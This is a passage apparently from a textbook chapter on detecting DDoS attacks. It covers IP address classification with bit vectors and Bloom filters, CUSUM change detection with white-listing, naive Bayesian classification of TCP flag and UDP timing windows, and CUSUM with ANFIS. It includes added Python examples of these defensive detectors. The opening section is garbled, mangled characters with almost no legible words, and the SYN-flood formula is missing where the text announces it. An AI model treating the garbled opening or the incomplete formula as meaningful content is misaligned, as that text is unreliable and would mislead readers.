; jnqjh j (j^ ^DMM ci^l«^ J-<^j ^^£3 A^jjLJI c aJ&II A^3j^ ^3Uj 

."classifying IP addresses" IP ojj^ < ipac - 

ddos 

.((NSP) ^) IP j j ^-*3^ IP ^lj^*^^ ^ ipac j 

V) NA !U^^ ddOS ^%^J ^ laJLujJ m ^ (jia^x-d ^Uaill ^jl£ lil AjA^j3 ddOS ^%^J Ikiml l <^jU3I 4_ild3^^ J^^-^^ (JjLklj 

.(^j^^ o^j*^) Aj (^j^W lP 3 ^*^ 

A^JjaJl JJ^ ^^>^- ^^-Sc V jl ipaC ^ A-ll^aJ <illa j (JJjWl ^aJJ 6<J^Isl!I JjlXjaLill L_fl JJ^ CllaJ (JasU ^^jll A^JjaJl til jLoJ ^^ic L_fl^Xj3l (J^.1 (j-d 

Jaslxj (JjjLujI ^^icj 6(<La^ 10 1 (j-« dlj^ ^jj^ ddos ^A^j ^^c^jjI ^jj 4L_iij^i3l Asu .ddos ^A^j cJ^*-^ uj^ 

c j _A j NA (jjSJWt (j^ 5_JliljVI <i^.j^JI ^a^j ddos j 'ipac j cJ^ ^j >>1 ^ s^j^JI IP (jjjUc J jj^a j 
.DDoS Detection u^j^ ^ ddos ^ ^^" > »^ l < a^ l a^3jIj^. 

AjA^j] t^JJi Asu a Iklujj g.1 - ^j; a3jj 4J| ddOS ^Af^J 6 ^ L ^ 4il t^c- SjLujj oA^i A c^j NA ^JI^JI (j-« JlaijVI -^>^aj 

W^l^ NA A (>« (JlS^VI J .^U-kaJl 3_Aj\i3l (jxuia (JjSj c _^j3I j IP (jJjUc JJJ-<J -lasa ^-LuJl i j& li^j a Li^jll jlai! 

<jajUjaj lA jUjcU pi > ^ijjll 4-Ajlill ^Ia^jjojI (jc L_fl3 j!i3l (_^l c Liaall 4j^j*iljjjail (j-d c Liaall ^1 I1a (_^^JJ <— JJUJ j 6^a J^^l ^1 JjJjoiJ 

J^Lk Ai^laiJI A£fxi3l Clila^ jl ^1 IP (jjjUc; ^LiaJI ^jlall ^ jl^J jjoj t^UJI iiaHll ^ 4Jl j^ilb jjA^JIj .Sjllall 

;^JU]| j^jll ^^Jc (Jasu ddOS ^f^J .^^^^ 4£jJo3I ia jjJj 

if (in state NA) then
    if NOT (StateChange(NA)) then        // no state change
        Update White-list (Add IP address/es to white-list)
    else                                 // state change to A
        state = A
        communicate White-list to the protected security device
if (in state A) then
    if (StateChange(A)) then             // state change to NA
        state = NA
        communicate to the protected security device to stop using the white-list

The approach has two failure modes. False positives arise when the "IP address distribution" of legitimate traffic changes abruptly, for example a flash crowd, or a burst of ICMP echo requests from many hosts that have not contacted the network before; these raise the count of new IP addresses just as an attack does. False negatives arise when the attack traffic uses source addresses that ipac already regards as known, for instance addresses recorded over "smaller historical time periods" that the attacker can reuse. To limit the second case ipac bounds the history it trusts: on the basis of the observed traffic, only source IP addresses seen within the last 24 hours are classified as known, and older addresses are treated as new again when they reappear.



IP Address Classification (ipac)

ipac requires a "data structure" in which the source IP addresses that have contacted the protected network can be stored, so that the source address of each arriving packet can be looked up and classified as known or new. The number of distinct source IP addresses seen by a busy network is large in normal operation and becomes very large during a flooding attack, where most of the addresses are spoofed or belong to a botnet, so the structure must support fast insertion and fast membership queries at line rate. Two structures are considered for ipac:

- Bit vector
- Bloom filter

For 32-bit IPv4 addresses a bit vector can be used directly: an "array" of 2^32 bits, that is 2^29 bytes or 0.5 GB, with one bit for every possible IPv4 address. When an address is seen its bit is set; classifying an address is a single bit test indexed by the address itself, so it is exact and fast, with no false positives and no false negatives. A bit vector is kept for each time "interval" so that addresses not seen within the history window can be forgotten.

For 128-bit IPv6 addresses a bit vector is not feasible: it would need 2^128 bits, and the address space is far too large to be indexed directly. Moving from 32-bit to 128-bit addresses means that the set of addresses seen must be represented approximately, and ipac uses Bloom filters for IPv6 address classification.

A Bloom filter is a bit vector of m bits together with k independent hash functions. It is a "compact representation" of a set: an element is inserted by computing its k hash values, each of which is an array index into the bit vector, and setting those k bits; a "membership query" computes the same k indexes and reports the element as present only if all k bits are set. Because different elements can hash to the same bits (a collision), a Bloom filter can answer "present" for an element that was never inserted, that is, it produces false positives. It never produces false negatives: an inserted element always finds all of its bits set. Bloom filters are therefore well suited to ipac for IPv6 membership queries, where a small rate of false positives only means that a few new addresses are misclassified as known. The false-positive rate is determined by the number of bits m, the number of inserted elements n and the number of hash functions k. Ripeanu et al. give the "theoretical analysis" of this relation; it is used to choose the best number of hash functions and the size of the bit vector that keep the expected false-positive rate at an acceptable level for the expected number of addresses.
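To make the size comparison and the Bloom filter behaviour concrete, here is an added Python example (not code from the paper or from ipac): it computes the memory a direct bit vector needs for a given address width, implements a Bloom filter over a bit vector with k hash functions, evaluates the theoretical false-positive rate, and classifies a constructed list of IPv6 source addresses as known or new the way ipac does. The double-hashing construction from one SHA-256 digest and the filter parameters are my choices.

```python
from __future__ import annotations

import hashlib
import math


def bit_vector_bytes(address_bits: int) -> int:
    """Bytes needed for a direct bit vector with one bit per possible address."""
    return 2 ** address_bits // 8


def false_positive_rate(m_bits: int, n_items: int, k_hashes: int) -> float:
    """Theoretical Bloom filter false-positive probability: (1 - e^(-kn/m))^k."""
    return (1.0 - math.exp(-k_hashes * n_items / m_bits)) ** k_hashes


def optimal_hash_count(m_bits: int, n_items: int) -> int:
    """k that minimises the false-positive rate for given m and n: (m/n) ln 2."""
    return max(1, round(math.log(2) * m_bits / n_items))


class BloomFilter:
    """Bit vector of m bits plus k hash functions.

    Inserted elements are always reported present (no false negatives);
    an absent element may be reported present when all of its k bits were
    set by other elements (a false positive caused by collisions).
    """

    def __init__(self, m_bits: int, k_hashes: int) -> None:
        self.m = m_bits
        self.k = k_hashes
        self.bits = bytearray((m_bits + 7) // 8)
        self.n = 0  # number of inserted elements

    def _indexes(self, item: str) -> list[int]:
        # Double hashing: k array indexes from the two 64-bit halves of one SHA-256
        # digest (assumption: SHA-256 is used for its uniform output, not for security).
        digest = hashlib.sha256(item.encode()).digest()
        h1 = int.from_bytes(digest[:8], "big")
        h2 = int.from_bytes(digest[8:16], "big") | 1  # odd, so the k indexes differ
        return [(h1 + i * h2) % self.m for i in range(self.k)]

    def add(self, item: str) -> None:
        for idx in self._indexes(item):
            self.bits[idx >> 3] |= 1 << (idx & 7)
        self.n += 1

    def __contains__(self, item: str) -> bool:
        return all(self.bits[idx >> 3] & (1 << (idx & 7)) for idx in self._indexes(item))

    def expected_fp_rate(self) -> float:
        return false_positive_rate(self.m, self.n, self.k)


def classify_sources(bf: BloomFilter, sources: list[str]) -> list[tuple[str, str]]:
    """ipac-style classification: 'known' if the filter already holds the address,
    otherwise 'new', in which case it is inserted so later packets from it are known."""
    out = []
    for addr in sources:
        if addr in bf:
            out.append((addr, "known"))
        else:
            bf.add(addr)
            out.append((addr, "new"))
    return out


if __name__ == "__main__":
    print("IPv4 bit vector:", bit_vector_bytes(32) / 2 ** 30, "GiB")
    print("IPv6 bit vector:", bit_vector_bytes(128), "bytes (infeasible)")
    # Constructed IPv6 sources: one address repeats, the rest are unseen.
    bf = BloomFilter(m_bits=1 << 20, k_hashes=optimal_hash_count(1 << 20, 100_000))
    print(classify_sources(bf, ["2001:db8::1", "2001:db8::2", "2001:db8::1", "2001:db8::3"]))
    print("expected FP rate after 100k inserts:", false_positive_rate(1 << 20, 100_000, bf.k))
```

With 2^20 bits and 100,000 addresses the filter uses 128 KiB instead of the 2^125 bytes a direct IPv6 bit vector would need, at the price of a false-positive rate below one percent.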

DDoS Detection (ddos)

Studies of high-rate flooding attacks show that during an attack the target receives packets from a large number of source IP addresses that it has never seen before, whether because the attack traffic carries spoofed sources or because it comes from a botnet whose members have not previously contacted the target. Legitimate traffic, by contrast, comes mostly from addresses that have visited the network before. A sudden rise in the number of new source IP addresses per time interval is therefore used as the indicator of attack.

ddos takes the count of new IP addresses reported by ipac for each interval as its input and detects an abrupt change in this count with a "sliding-window-based non-parametric" CUSUM algorithm: the counts of recent intervals form the reference for normal behaviour, the positive deviations from that reference are accumulated, and an attack is declared when the accumulated sum exceeds a threshold. Ahmed, E., G. Mohay, A. Tickle and S. Bhatia proposed this design, in which the DMM combines ipac (with Bloom filters for IP address classification) and ddos (the change detection algorithm).
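The ddos pseudocode above and the CUSUM description are combined in this added Python example (my own code, not the authors' implementation). ipac is stood in for by a plain set of previously seen addresses, the detector is a sliding-window non-parametric CUSUM over the per-interval count of new addresses, and the protected security device is a stub that records when it is told to use or stop using the white-list. The window length, the slack k, the threshold h, the recovery rule (the attack state ends at the first interval whose count is back at the normal level) and the constructed traffic are assumptions.

```python
from __future__ import annotations

from collections import deque
from typing import Optional


class NewIpCusum:
    """Sliding-window non-parametric CUSUM on per-interval counts of new source IPs.

    The last `window` counts seen in the no-attack state estimate the normal level;
    S(n) = max(0, S(n-1) + x(n) - mean - k*mean) accumulates the excess.
    NA -> A when S(n) exceeds h. A -> NA (assumed recovery rule) at the first
    interval whose increment is non-positive, i.e. the count is back to normal.
    """

    def __init__(self, window: int = 10, slack: float = 0.5, threshold: float = 40.0) -> None:
        self.window = deque(maxlen=window)
        self.slack = slack          # k, as a fraction of the estimated mean
        self.threshold = threshold  # h
        self.s = 0.0
        self.state = "NA"

    def update(self, count: int) -> Optional[str]:
        mean = sum(self.window) / len(self.window) if self.window else float(count)
        increment = count - mean - self.slack * max(mean, 1.0)
        transition = None
        if self.state == "NA":
            self.s = max(0.0, self.s + increment)
            if self.s > self.threshold:
                self.state, transition = "A", "NA->A"
            else:
                self.window.append(count)  # learn the normal level only while not under attack
        elif increment <= 0:
            self.s, self.state, transition = 0.0, "NA", "A->NA"
            self.window.append(count)
        else:
            self.s += increment
        return transition


class ProtectedDevice:
    """Stand-in (constructed) for the firewall/IPS that receives the white-list."""

    def __init__(self) -> None:
        self.white_list: Optional[frozenset] = None
        self.log: list = []

    def use_white_list(self, wl: frozenset) -> None:
        self.white_list = wl
        self.log.append(("use", len(wl)))

    def stop_white_list(self) -> None:
        self.white_list = None
        self.log.append(("stop",))


class DMM:
    """ipac (a plain set here) plus the ddos state machine from the pseudocode above."""

    def __init__(self, detector: NewIpCusum, device: ProtectedDevice) -> None:
        self.known: set = set()
        self.white_list: set = set()
        self.detector = detector
        self.device = device

    def interval(self, sources: set) -> Optional[str]:
        new = [ip for ip in sources if ip not in self.known]
        self.known.update(new)
        transition = self.detector.update(len(new))
        if self.detector.state == "NA" and transition is None:
            self.white_list.update(sources)            # in NA, no state change
        elif transition == "NA->A":
            self.device.use_white_list(frozenset(self.white_list))
        elif transition == "A->NA":
            self.device.stop_white_list()
        return transition


def simulate() -> dict:
    """Constructed traffic: 15 quiet intervals, 5 flood intervals, 10 quiet intervals."""
    device = ProtectedDevice()
    dmm = DMM(NewIpCusum(window=10, slack=0.5, threshold=40.0), device)
    transitions = []
    for i in range(30):
        if 15 <= i < 20:  # flood: 50 never-seen (spoofed) sources per interval
            sources = {f"198.{i}.0.{j}" for j in range(50)}
        else:             # quiet: 3 new visitors plus 2 returning ones
            sources = {f"10.0.{i}.{j}" for j in (1, 2, 3)} | {"192.0.2.1", "192.0.2.2"}
        t = dmm.interval(sources)
        if t:
            transitions.append((i, t))
    return {"transitions": transitions, "device_log": device.log,
            "white_list_size": len(dmm.white_list)}


if __name__ == "__main__":
    print(simulate())
```

In the simulation the white-list handed to the device at the NA to A transition contains only the 47 addresses seen before the flood; the 250 spoofed sources never enter it, and the device is told to stop using it as soon as the count of new addresses drops back.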




[Figure: test-bed topology. Attack traffic generated with fudp and normal traffic replayed with tcpreplay are both sent through a switch to the victim host.]



DoS Detection Using Naive Bayesian Classifiers

Much of the early work on applying machine-learning to network security aimed at general intrusion detection, that is at a broad class of "intrusion attacks" including probing, remote-to-local access, user-to-root ("root escalation") and "scripts attacks"; DoS attacks were only one class among several. Those systems typically relied on "computationally intensive models" such as hidden Markov models (HMMs) and artificial neural networks (ANNs), which are impractical at line speed, and they were trained and evaluated on offline datasets such as the DARPA and KDD intrusion-detection data, whose traffic does not resemble the attack traffic seen today.

The goal of the system described here is different: (a) to detect DDoS attacks, including flooding attacks, with (b) compact models that can be built from a small amount of training data and (c) classified at "line speeds".

Other statistical approaches have been proposed. A chi-square test on the entropy values of packet header fields detects changes in their distribution; Jin and Yeung apply "multivariate correlation analysis", building a "covariance matrix" of traffic features, to detect SYN flooding; the CUSUM algorithm is used to detect changes in the mean of a traffic measure. "Pattern analysis" and "machine learning" methods have been more widely used. Xie et al. model application layer DDoS attacks with hidden semi-Markov models of user browsing behaviour. Support vector machines, genetic algorithms, artificial neural networks (ANN) and Bayesian learning have all been applied to DDoS detection, and Hybrid modelling techniques combine several of them. Work that specifically uses "Bayesian classifiers" for DDoS includes:

- Xu, X., Y. Sun and Z. Huang, who detect DDoS attacks from features of the source IP addresses and of the traffic rate observed at routers, with the routers cooperating through Cooperative Reinforcement Learning techniques.
- C. Lee, T. Shon, K.H. Cho and J. Moon, who use a traffic rate analyzer (TRA) that computes a TCP flag rate (the occurrence rate of each flag in the TCP headers) and a "protocol rate" (the share of each protocol in the traffic). These rates are fed to a classifier, including SVMs, that distinguishes normal traffic from DoS, DDoS and DrDoS attacks.

Detection Approach

The detector is placed, like the DMM described earlier, in front of the protected network so that all of its incoming traffic is observed. Unlike "signature-based detection techniques", which match traffic against patterns of known attacks and miss new ones, the approach models the statistics of normal traffic and flags deviations from it. It has three steps.

Traffic separation. Incoming traffic is divided into "streams" by protocol, destination IP and destination port, since the normal behaviour of TCP traffic to a web server differs from that of UDP traffic to a DNS server. Each stream is modelled and classified separately.

Windowing. Each stream is further divided into windows, the "logical entities" on which classification is performed. A "window" can be a time window (all packets in a fixed time interval) or a packet window (a fixed number of consecutive packets). "Packet windows" are used here because their size does not vary with the traffic rate, which keeps the feature vectors comparable, while the time it takes to fill a packet window still carries the rate information.

Flagging an attack. A single window classified as abnormal is not yet an attack: a short burst of normal traffic can produce an abnormal window. A step-based mechanism is used instead: an abnormal window count (AWC) is raised by a step for each window classified as abnormal and lowered for each normal window, and an attack is flagged only when the AWC exceeds a threshold. This reduces false alarms while a sustained attack is still detected within a few windows.

Modelling TCP Traffic

The model has to capture normal behaviour without being tied to particular destinations, and for TCP the information used is the set of TCP flags in the header, which distinguishes connection setup, data transfer and teardown and is exactly what many flooding attacks distort. The TCP header carries a flag field in which each flag is a single bit; the six classical TCP flags are SYN, ACK, FIN, PSH, URG and RST (the newer ECE and CWR flags, used for congestion notification, are rarely seen and are ignored here). A packet is characterised by the combination of flags set, which gives 2^6 = 64 possible combinations. Many of them are "seldom used packets": combinations that never occur in legitimate traffic (for example all flags set, or SYN together with FIN) and whose appearance is itself suspicious. A "packet window" is summarised by how many packets of each flag combination it contains, since normal traffic has a characteristic mix (roughly one SYN and one FIN/ACK per connection, many ACK and PSH/ACK packets) while attack traffic, such as a SYN flood, concentrates on one combination.

Treating all 64 combinations as separate features would make the model large and would leave many combinations with too few observations. The combinations are therefore grouped into six packet types, chosen so that the common combinations are kept apart and the rare ones are pooled:

1. T1: Packets with RST bit set (irrespective of other bits) - 32 packet types
2. T2: SYN packets - 1 packet type
3. T3: ACK packets - 1 packet type
4. T4: FIN/ACK packets - 1 packet type
5. T5: PSH/ACK packets - 1 packet type
6. T6: Rest of the packets - 28 packet types. Includes seldom used packets and invalid packets

For a packet window of N packets the count of each type lies between 0 and N, so each type has (N+1) possible values and the six types together give 6*(N+1) probability values that the classifier must estimate. Only a few of the 64 combinations, and hence a few of these values, actually occur in normal traffic, so most of the probability mass is concentrated in a small number of counts. Naive Bayesian classifiers treat the six counts as independent given the class (normal or attack) and multiply their conditional probabilities; a count value that never appeared in the training data would receive probability zero and veto the whole window, which is undesirable for a model built from a small training set. Laplacian smoothing is therefore applied: every possible value receives a small non-zero probability, so that an unseen count lowers the probability of a class without eliminating it.

To reduce the number of parameters further, the (N+1) possible counts of each type are grouped into K "bands", and each band has one probability per class; the probabilities for the attack class are estimated the same way. Grouping the counts this way, with bands chosen so that the counts seen in normal traffic are well separated from those seen during attacks, keeps the model compact while preserving its discriminating power. A window is then classified from the bands its six counts fall into: if the probability of the window under the normal model is lower than under the attack model, the window is classified as abnormal.
Modelling UDP Traffic

UDP is a "connection-less" protocol: unlike TCP, its header carries no flags and no connection state, so the approach used for TCP cannot be applied. A UDP flooding attack does not distort any header field; it simply sends packets at a far higher rate than normal, and because the payload is arbitrary and application-specific, the UDP header alone gives no usable signature. The UDP model therefore uses timing.

The feature is the window arrival time (WAT), the time elapsed between the arrival of the first packet P1 and the last packet PN of a packet window of N packets. Normal traffic fills a window slowly, and WATs are large and spread over a range; during a flooding attack the window fills in a fraction of the normal time and WATs collapse to small values. The WATs observed in the training traffic are divided into bands, each band covering a range of arrival times, and the probability that a normal window falls into each band is estimated from the training data, with Laplacian smoothing as for TCP so that no band has probability zero. Each incoming window is assigned to the band containing its WAT; if the probability of that band under the normal model is lower than under the attack model, the window is classified as abnormal. As with TCP, windows only lead to an attack being flagged through the abnormal window count.
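The following Python is an added example (not the authors' system) of the TCP and UDP models described above: packets are mapped to the six types, per-window counts are collapsed into K bands, a naive Bayesian classifier with Laplacian smoothing is trained on constructed normal and SYN-flood windows, and the step-based abnormal window count flags the attack. The window size (20 packets), K = 4, the AWC steps and threshold, the WAT band edges and all traffic windows are constructed assumptions.

```python
from __future__ import annotations

import math
from collections import Counter

FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
TYPES = ("T1", "T2", "T3", "T4", "T5", "T6")


def packet_type(flags: int) -> str:
    """Map the six classical TCP flag bits to the six packet types T1..T6."""
    if flags & FLAGS["RST"]:
        return "T1"
    if flags == FLAGS["SYN"]:
        return "T2"
    if flags == FLAGS["ACK"]:
        return "T3"
    if flags == FLAGS["FIN"] | FLAGS["ACK"]:
        return "T4"
    if flags == FLAGS["PSH"] | FLAGS["ACK"]:
        return "T5"
    return "T6"  # everything else, including seldom used and invalid combinations


def band(count: int, window_size: int, k_bands: int) -> int:
    """Collapse a count in 0..N into one of K bands of (nearly) equal width."""
    return min(k_bands - 1, count * k_bands // (window_size + 1))


def tcp_window_features(flags_list: list[int], k_bands: int) -> tuple[int, ...]:
    """Banded count of each packet type in one packet window."""
    counts = Counter(packet_type(f) for f in flags_list)
    return tuple(band(counts.get(t, 0), len(flags_list), k_bands) for t in TYPES)


def wat_band(timestamps: list[float], band_edges: list[float]) -> int:
    """UDP feature: window arrival time (last - first packet) mapped to a band."""
    wat = timestamps[-1] - timestamps[0]
    return sum(1 for edge in band_edges if wat >= edge)


class NaiveBayesWindowClassifier:
    """Naive Bayes over banded features with Laplacian (add-one) smoothing."""

    def __init__(self, k_bands: int) -> None:
        self.k = k_bands
        self.class_counts: Counter = Counter()
        self.feature_counts: Counter = Counter()  # (class, feature index, band) -> count

    def train(self, windows_by_class: dict[str, list[tuple[int, ...]]]) -> None:
        for cls, windows in windows_by_class.items():
            for feats in windows:
                self.class_counts[cls] += 1
                for i, b in enumerate(feats):
                    self.feature_counts[(cls, i, b)] += 1

    def log_posterior(self, feats: tuple[int, ...], cls: str) -> float:
        total = sum(self.class_counts.values())
        lp = math.log((self.class_counts[cls] + 1) / (total + len(self.class_counts)))
        for i, b in enumerate(feats):  # +1 / +K smoothing: an unseen band never gives probability 0
            lp += math.log((self.feature_counts[(cls, i, b)] + 1) / (self.class_counts[cls] + self.k))
        return lp

    def classify(self, feats: tuple[int, ...]) -> str:
        return max(self.class_counts, key=lambda c: self.log_posterior(feats, c))


def flag_attack(labels: list[str], awc_threshold: int) -> list[bool]:
    """Step-based flagging: the AWC rises by one per abnormal window and falls by one per
    normal window (step sizes are an assumption); the attack is flagged while AWC >= threshold."""
    awc, flags = 0, []
    for lab in labels:
        awc = awc + 1 if lab == "attack" else max(0, awc - 1)
        flags.append(awc >= awc_threshold)
    return flags


def make_window(spec: dict[str, int]) -> list[int]:
    """Constructed packet window: {'PSH/ACK': 5, ...} -> list of flag bytes."""
    out = []
    for name, n in spec.items():
        out += [sum(FLAGS[f] for f in name.split("/"))] * n
    return out


# Constructed training windows of 20 packets each (not captured traffic).
NORMAL = [make_window({"SYN": 2, "SYN/ACK": 2, "ACK": 9, "PSH/ACK": 5, "FIN/ACK": 2}),
          make_window({"SYN": 1, "SYN/ACK": 1, "ACK": 11, "PSH/ACK": 5, "FIN/ACK": 1, "RST": 1}),
          make_window({"SYN": 3, "SYN/ACK": 3, "ACK": 8, "PSH/ACK": 4, "FIN/ACK": 2})]
SYN_FLOOD = [make_window({"SYN": 18, "ACK": 2}), make_window({"SYN": 20}),
             make_window({"SYN": 17, "SYN/ACK": 1, "ACK": 2})]


def run_detector(stream: list[list[int]], k_bands: int = 4, awc_threshold: int = 3) -> list[bool]:
    clf = NaiveBayesWindowClassifier(k_bands)
    clf.train({"normal": [tcp_window_features(w, k_bands) for w in NORMAL],
               "attack": [tcp_window_features(w, k_bands) for w in SYN_FLOOD]})
    labels = [clf.classify(tcp_window_features(w, k_bands)) for w in stream]
    return flag_attack(labels, awc_threshold)


if __name__ == "__main__":
    stream = NORMAL[:1] * 5 + SYN_FLOOD[:1] * 6 + NORMAL[1:2] * 5
    print(run_detector(stream))
```

With K = 4 bands on 20-packet windows, each type has 4 parameters per class instead of 21, and the attack is flagged at the third consecutive abnormal window rather than at the first.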

DoS Detection Using CUSUM and Adaptive Neuro-Fuzzy Inference System

In this approach a CUSUM algorithm monitors an attack characteristic variable X(n), a count computed from the traffic in the n-th time interval, and raises an alarm when the "cumulative sum" of the positive deviations of X(n) from its normal level exceeds a threshold. The weakness of plain CUSUM is the "threshold value": a fixed threshold is difficult to choose and produces many false positives when the normal traffic fluctuates. Instead of a fixed threshold, a fuzzy inference system (FIS) judges the CUSUM output, and because the membership function parameters of the FIS are hard to tune by hand, an adaptive neuro-fuzzy inference system (ANFIS) learns them from training data. The resulting detector adapts to the traffic observed during training and detects DoS/DDoS attacks by their deviation from the normal pattern.

Defences against DoS are commonly divided into Standard and Trained mechanisms. Signature-based systems such as Snort are fast but can only recognise attacks whose signatures are present in their "signature databases", so new attacks go undetected; anomaly-based systems learn a model of normal traffic and flag deviations from it. D-WARD (DDoS Network Attack Recognition and Defense), by Mirkovic et al., is deployed at the source network: it observes the two-way traffic between the network it protects and the rest of the Internet, rate-limits flows that do not behave like legitimate two-way communication, and operates in autonomous mode without cooperation from other networks. Mahajan et al. proposed aggregate congestion control (ACC), in which routers identify the aggregate of traffic responsible for congestion and rate-limit it; XenoService replicates a server under attack across many hosting sites so that the attack is absorbed.

"Standard" mechanisms are those built into the "protocol stack", such as SYN cookies and the SYN cache, which keep a server reachable during a SYN flood by not allocating connection state until the TCP three-way handshake completes; each handles a single attack type and protects only the host on which it runs. "Trained" mechanisms learn "threshold values" from observed traffic and raise alarms when the traffic exceeds them, as CUSUM-based detectors do. The Cumulative Sum-based Intrusion Prevention System (CSIPS) is one example: it applies CUSUM to SYN flooding and also uses CUSUM together with a space similarity measure for P2P traffic. A threshold learned from traffic is more robust than a fixed one, but a single threshold still applies to all conditions; in the approach described here the threshold decision is handed to ANFIS.

Detecting Denial-of-Service Attacks with CUSUM

The detector sits inside the DMM, in front of the protected system, as in the approaches above. CUSUM is chosen because it has a simple parametric description when the distributions before and after the change are known, and a non-parametric form, used here, when they are not: the algorithm accumulates the amount by which the observed variable exceeds its expected level and detects the change point at which the accumulated sum becomes large, adjusting dynamically as the cumulative sum grows or is reset. Let X(n) be the value of the attack characteristic variable in the n-th interval. Five variables are monitored, one per attack type: X_SYN(n), X_LAND(n), X_SMURF(n), X_UDP(n) and X_ICMP(n), corresponding to SYN Flood, Land, Smurf, UDP Flood and ICMP Flood attacks; they are the "attack characteristic variables", and only these "variables" are needed for the detection described here. Under normal traffic each X(n) fluctuates around a small mean; during the corresponding attack it rises sharply, so the CUSUM of X(n) grows steadily. The variables are defined as follows:

SYN flood attack, where the counts of RST, SYN and SYN/ACK packets are taken into consideration:

Land attack, where N[(SRC_IP = DST_IP) & (SYN set)] represents the number of incoming packets having the same source IP address and destination IP address with the SYN flag set:

X_LAND(n) = N[(SRC_IP = DST_IP) & (SYN set)]

Smurf attack, where N(DEST_ADDR = BADDR) denotes the number of ICMP requests made to the broadcast address; the attack exploits the vulnerability in the ICMP protocol:

X_SMURF(n) = N(DEST_ADDR = BADDR)

UDP flooding attack, where N(DEST_ADDR = HOST_IP) denotes the number of incoming UDP packets, N(SRC_ADDR = HOST_IP) denotes the number of outgoing UDP packets and N_ICMP_error denotes the number of ICMP Destination Port Unreachable error packets:

X_UDP(n) = N(DEST_ADDR = HOST_IP) - N(SRC_ADDR = HOST_IP)

ICMP flood attack:

X_ICMP(n) = total payload size of the ICMP request packets

The CUSUM of each attack characteristic variable is computed per interval, and its value is passed to the ANFIS engine for the final decision.
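As an added example (not the authors' code), this Python computes the attack characteristic variables above from constructed per-interval packet records and runs a non-parametric CUSUM over X_UDP(n) to locate a UDP flood; the X_SYN(n) formula is not shown on the page and is therefore left out, and N_ICMP_error is computed but reported separately because the page does not show where it enters X_UDP(n). The host address, the broadcast address, the CUSUM parameters and the packet records are assumptions.

```python
from dataclasses import dataclass, field
from typing import Optional

HOST_IP = "192.0.2.10"     # assumed address of the protected host
BADDR = "192.0.2.255"      # assumed directed-broadcast address of its subnet


@dataclass
class Packet:
    """Minimal per-packet record (constructed; only the fields the variables need)."""
    proto: str                       # "TCP", "UDP" or "ICMP"
    src: str
    dst: str
    flags: frozenset = field(default_factory=frozenset)  # TCP flag names
    icmp_type: Optional[int] = None  # 8 = echo request, 3 = destination unreachable
    icmp_code: Optional[int] = None  # for type 3: code 3 = port unreachable
    payload: int = 0                 # payload bytes


def x_land(pkts):
    """N[(SRC_IP = DST_IP) & (SYN set)]"""
    return sum(1 for p in pkts if p.proto == "TCP" and p.src == p.dst and "SYN" in p.flags)


def x_smurf(pkts):
    """N(DEST_ADDR = BADDR): ICMP echo requests sent to the broadcast address."""
    return sum(1 for p in pkts if p.proto == "ICMP" and p.icmp_type == 8 and p.dst == BADDR)


def x_udp(pkts):
    """N(DEST_ADDR = HOST_IP) - N(SRC_ADDR = HOST_IP) over UDP packets."""
    incoming = sum(1 for p in pkts if p.proto == "UDP" and p.dst == HOST_IP)
    outgoing = sum(1 for p in pkts if p.proto == "UDP" and p.src == HOST_IP)
    return incoming - outgoing


def n_icmp_error(pkts):
    """N_ICMP_error: ICMP destination port unreachable packets (reported separately)."""
    return sum(1 for p in pkts if p.proto == "ICMP" and p.icmp_type == 3 and p.icmp_code == 3)


def x_icmp(pkts):
    """Total payload size of the ICMP echo requests addressed to the host."""
    return sum(p.payload for p in pkts if p.proto == "ICMP" and p.icmp_type == 8 and p.dst == HOST_IP)


def cusum(series, mean, slack, threshold):
    """Non-parametric CUSUM: S(n) = max(0, S(n-1) + X(n) - mean - slack).
    Returns the sums and the interval indexes at which S(n) exceeds the threshold."""
    s, sums, alarms = 0.0, [], []
    for i, x in enumerate(series):
        s = max(0.0, s + x - mean - slack)
        sums.append(s)
        if s > threshold:
            alarms.append(i)
    return sums, alarms


def quiet_interval():
    """Constructed normal interval: two answered UDP queries and one ping."""
    return [Packet("UDP", "198.51.100.5", HOST_IP), Packet("UDP", HOST_IP, "198.51.100.5"),
            Packet("UDP", "198.51.100.6", HOST_IP), Packet("UDP", HOST_IP, "198.51.100.6"),
            Packet("ICMP", "198.51.100.7", HOST_IP, icmp_type=8, payload=56)]


def udp_flood_interval(n):
    """Constructed UDP flood: n packets to closed ports, answered only by ICMP errors."""
    return ([Packet("UDP", f"203.0.113.{i % 250}", HOST_IP) for i in range(n)]
            + [Packet("ICMP", HOST_IP, "203.0.113.1", icmp_type=3, icmp_code=3) for _ in range(n // 2)])


def detect_udp_flood(intervals, mean=0.0, slack=1.0, threshold=50.0):
    """X_UDP(n) per interval and the intervals at which its CUSUM raises an alarm."""
    series = [x_udp(pk) for pk in intervals]
    return series, cusum(series, mean, slack, threshold)[1]


if __name__ == "__main__":
    intervals = [quiet_interval()] * 5 + [udp_flood_interval(40)] * 3 + [quiet_interval()] * 2
    print(detect_udp_flood(intervals))
```

Note that once the sum has crossed the threshold it only decays by the slack per interval, so the alarm persists after the flood stops; this is the behaviour that motivates feeding the CUSUM value to the ANFIS decision instead of using the raw threshold.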

ANFIS Engines

Fuzzy logic and neural networks complement each other: fuzzy logic handles the "vagueness" of boundaries such as "high traffic" and yields interpretable rules, but it has no learning mechanism, while neural networks learn from data but give no insight into what they learned. Neuro-fuzzy systems combine the two, and the Adaptive Neuro-Fuzzy Inference System ("ANFIS") is the combination of an Artificial Neural Network (ANN) and a Fuzzy Inference System (FIS): the FIS provides the rule structure and the ANN learns its membership function parameters from training data. ANFIS is used here because the CUSUM "threshold" is the weak point of the detector: a crisp threshold on the cumulative sum either misses low-rate attacks or raises false alarms. ANFIS replaces it with a fuzzy logic-based mechanism whose membership function parameters are tuned by the neural network during training, which makes the FIS more effective than one configured by hand.

The adaptive network is a "five-layer feed-forward network" in which every node of a layer applies the same kind of node function: layer 1 computes the membership degrees of the input in the fuzzy sets (its nodes hold the fuzzy membership parameters that are adjusted during training), layer 2 computes the firing strength of each rule, layer 3 normalises the firing strengths, layer 4 computes each rule's consequent weighted by its normalised strength, and layer 5 sums them into the single output. The rules are defined on the CUSUM value X(n) of each attack characteristic variable:

RULE 1: If (X(n) is HIGH) then attack is HIGH
RULE 2: If (X(n) is MEDIUM) then attack is MEDIUM
RULE 3: If (X(n) is LOW) then attack is LOW




[Fig. 5.10 Feed-forward networks: the five-layer ANFIS structure, with the input X(n) passing through layers 1 to 5 to a single output.]



Decision-Making

